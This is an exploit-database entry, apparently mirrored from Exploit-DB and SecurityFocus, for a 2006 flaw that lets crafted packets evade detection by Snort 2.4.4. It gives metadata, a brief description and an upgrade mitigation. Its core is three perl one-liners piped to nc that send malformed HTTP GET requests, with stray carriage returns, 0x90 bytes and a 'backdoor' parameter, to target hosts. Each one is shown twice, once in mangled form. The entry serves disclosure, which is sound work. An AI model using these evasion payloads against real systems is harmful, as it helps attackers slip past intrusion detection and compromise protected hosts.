header-logo
Suggest Exploit
vendor:
Snort
by:
SecurityFocus
7.5
CVSS
HIGH
Bypass Detection
20
CWE
Product Name: Snort
Affected Version From: Snort 2.4.4
Affected Version To: Other versions may be vulnerable as well.
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Snort Bypass Detection Vulnerability

Snort is reportedly prone to a vulnerability that may allow malicious packets to bypass detection. A successful attack can allow attackers to bypass intrusion detection and to carry out attacks against computers protected by Snort. This vulnerability affects Snort 2.4.4. Other versions may be vulnerable as well. Examples of malicious packets include: perl -e'print "GET /www.example.com?paramter=|backdoorr http/1.0rnrn"'|nc vulnerable.server 80; perl -e 'print "GET x90x90x0d http/1.0rnrn"'|nc 192.168.1.3 80; perl -e 'print "GET x0d/index.phpx90x90 HTTP/1.0nrn"'|nc 192.168.1.3 80

Mitigation:

Upgrade to the latest version of Snort to mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18200/info

Snort is reportedly prone to a vulnerability that may allow malicious packets to bypass detection. 

A successful attack can allow attackers to bypass intrusion detection and to carry out attacks against computers protected by Snort.

This vulnerability affects Snort 2.4.4. Other versions may be vulnerable as well.

perl -e'print "GET /www.example.com?paramter=|backdoor\r http/1.0\r\n\r\n"'|nc vulnerable.server 80

perl -e 'print "GET \x90\x90\x0d http/1.0\r\n\r\n"'|nc 192.168.1.3 80

perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc 192.168.1.3 80

Navigation

Suggest Exploit

Services By CQR